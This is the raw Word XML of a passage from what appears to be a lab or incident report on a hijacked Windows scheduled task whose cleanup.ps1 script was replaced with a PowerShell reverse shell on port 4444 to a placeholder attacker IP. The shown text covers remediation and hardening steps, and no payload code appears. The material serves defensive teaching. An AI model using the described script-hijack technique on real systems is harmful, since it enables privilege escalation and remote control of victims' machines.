          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Port:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444/TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2327BA0C" w14:textId="77777777" w:rsidR="008D7943" w:rsidRPr="00680EA3" w:rsidRDefault="008D7943" w:rsidP="00680EA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66116B37" w14:textId="77777777" w:rsidR="009B3923" w:rsidRDefault="009B3923" w:rsidP="00500AD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A58E51D" w14:textId="35A0EE26" w:rsidR="00836EF2" w:rsidRDefault="00500AD9" w:rsidP="00C867A9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc220896690"/>
      <w:commentRangeStart w:id="29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation </w:t>
      </w:r>
      <w:commentRangeEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="29"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Strategies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="2B5644FE" w14:textId="77777777" w:rsidR="00C867A9" w:rsidRPr="00C867A9" w:rsidRDefault="00C867A9" w:rsidP="00C867A9"/>
    <w:p w14:paraId="47B628FB" w14:textId="77777777" w:rsidR="00535D2A" w:rsidRPr="00535D2A" w:rsidRDefault="00535D2A" w:rsidP="00535D2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>1. File Permission Hardening (Stop &amp; Prevent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324EF2BC" w14:textId="77777777" w:rsidR="00535D2A" w:rsidRPr="00535D2A" w:rsidRDefault="00535D2A" w:rsidP="00535D2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The root cause was that Authenticated Users had "Full Control" over the script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C2F010" w14:textId="66AAE879" w:rsidR="00535D2A" w:rsidRPr="00535D2A" w:rsidRDefault="00535D2A" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Use the icacls command to reset the permissions on the C:\TaskScripts\ folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66806084" w14:textId="45A56A4F" w:rsidR="00535D2A" w:rsidRPr="00535D2A" w:rsidRDefault="00535D2A" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Ensure only SYSTEM and Administrators have "Write" or "Modify" permissions. Regular users should have "Read &amp; Execute" only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED32FCB" w14:textId="77777777" w:rsidR="00836EF2" w:rsidRDefault="00836EF2" w:rsidP="00500AD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E80560E" w14:textId="77777777" w:rsidR="00D51018" w:rsidRPr="00D51018" w:rsidRDefault="00D51018" w:rsidP="00D51018">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>2. Integrity Restoration (Eradicate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72612E" w14:textId="77777777" w:rsidR="00D51018" w:rsidRPr="00D51018" w:rsidRDefault="00D51018" w:rsidP="00D51018">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The cleanup.ps1 file is currently a "trap" containing a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B06F28E" w14:textId="1145EB8B" w:rsidR="00D51018" w:rsidRPr="00D51018" w:rsidRDefault="00D51018" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Delete the compromised cleanup.ps1 file immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0494316B" w14:textId="4269E3E6" w:rsidR="00D51018" w:rsidRPr="00D51018" w:rsidRDefault="00D51018" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Restore the original, legitimate version of the script from a secure backup or a known-good source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B69A0E8" w14:textId="77777777" w:rsidR="00D51018" w:rsidRDefault="00D51018" w:rsidP="00500AD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5292EF1E" w14:textId="77777777" w:rsidR="005E48CF" w:rsidRPr="005E48CF" w:rsidRDefault="005E48CF" w:rsidP="005E48CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>3. Session Termination (Containment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC2E6F" w14:textId="77777777" w:rsidR="005E48CF" w:rsidRPr="005E48CF" w:rsidRDefault="005E48CF" w:rsidP="005E48CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>If the attacker is currently connected to the machine, the connection must be severed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BE3EAE" w14:textId="7328B501" w:rsidR="005E48CF" w:rsidRPr="005E48CF" w:rsidRDefault="005E48CF" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Identify and terminate the suspicious powershell.exe process that is communicating with the attacker's IP (&lt;ATTACKER_IP&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31775155" w14:textId="7BB4E1A5" w:rsidR="005E48CF" w:rsidRPr="005E48CF" w:rsidRDefault="005E48CF" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>If a breach is suspected to be widespread, isolate the victim machine from the network to prevent the attacker from moving to other computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877D265" w14:textId="77777777" w:rsidR="005E48CF" w:rsidRDefault="005E48CF" w:rsidP="00500AD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F76DBE5" w14:textId="77777777" w:rsidR="001833AD" w:rsidRPr="001833AD" w:rsidRDefault="001833AD" w:rsidP="001833AD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>4. Task Audit (Review)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDE91F1" w14:textId="77777777" w:rsidR="001833AD" w:rsidRPr="001833AD" w:rsidRDefault="001833AD" w:rsidP="001833AD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Check if the attacker scheduled any new tasks to stay in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E91BBC5" w14:textId="1A693FA6" w:rsidR="001833AD" w:rsidRPr="001833AD" w:rsidRDefault="001833AD" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Review the Windows Task Scheduler for any unfamiliar tasks created around the time of the incident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B821F2" w14:textId="52BB7C79" w:rsidR="001833AD" w:rsidRPr="001833AD" w:rsidRDefault="001833AD" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Verify that the "CleanupTask" (or the task you used) is still pointing to the correct file path and hasn't been modified to run other malicious commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C93CA5D" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="00D01BC9" w:rsidRDefault="00500AD9" w:rsidP="00500AD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC732D2" w14:textId="77777777" w:rsidR="00500AD9" w:rsidRPr="00D01BC9" w:rsidRDefault="00500AD9" w:rsidP="00500AD9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc220896691"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Control/Mitigation </w:t>
      </w:r>
      <w:commentRangeStart w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:commentRangeEnd w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="31"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="691A782D" w14:textId="77777777" w:rsidR="00B739EE" w:rsidRDefault="00B739EE" w:rsidP="00500AD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C754D43" w14:textId="77777777" w:rsidR="00967E79" w:rsidRPr="00967E79" w:rsidRDefault="00967E79" w:rsidP="00967E79">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>1. Enforcement of "Least Privilege" for Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B21B730" w14:textId="6AC31832" w:rsidR="00967E79" w:rsidRPr="00967E79" w:rsidRDefault="00967E79" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit all existing Scheduled Tasks to ensure they do not run as SYSTEM unless </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>absolutely necessary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377DA0F4" w14:textId="59842B33" w:rsidR="00967E79" w:rsidRPr="00967E79" w:rsidRDefault="00967E79" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>For tasks that only perform file cleanups or local maintenance, reconfigure them to run under a dedicated "Service Account" with restricted permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994756C" w14:textId="3E7A3917" w:rsidR="00967E79" w:rsidRPr="00967E79" w:rsidRDefault="00967E79" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>If a task runs as a lower-privilege user, even a successful script hijack won't result in full system takeover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74055D61" w14:textId="77777777" w:rsidR="00B739EE" w:rsidRDefault="00B739EE" w:rsidP="00500AD9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67045A31" w14:textId="77777777" w:rsidR="004606DE" w:rsidRPr="004606DE" w:rsidRDefault="004606DE" w:rsidP="004606DE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>2. Implementation of PowerShell Constrained Language Mode (CLM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D04FEB1" w14:textId="1A1C9899" w:rsidR="004606DE" w:rsidRPr="004606DE" w:rsidRDefault="004606DE" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use Group Policy (GPO) to enable Constrained Language Mode for standard users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AB8D90" w14:textId="5616F29B" w:rsidR="004606DE" w:rsidRPr="004606DE" w:rsidRDefault="004606DE" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>CLM restricts the types of commands PowerShell can run, blocking the complex "Sockets" and "API" calls used in your reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5762AF2B" w14:textId="49661A05" w:rsidR="004606DE" w:rsidRDefault="004606DE" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The attacker’s script would simply fail to run, even if they successfully overwrote the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CD716B" w14:textId="77777777" w:rsidR="0051731C" w:rsidRDefault="0051731C" w:rsidP="0051731C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB27926" w14:textId="77777777" w:rsidR="0051731C" w:rsidRPr="0051731C" w:rsidRDefault="0051731C" w:rsidP="0051731C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>3. PowerShell Code Signing Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDE79AE" w14:textId="7693395B" w:rsidR="0051731C" w:rsidRPr="0051731C" w:rsidRDefault="0051731C" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Set the PowerShell Execution Policy to "AllSigned".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEEB7A5" w14:textId="090C3CB1" w:rsidR="0051731C" w:rsidRPr="0051731C" w:rsidRDefault="0051731C" w:rsidP="0093205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
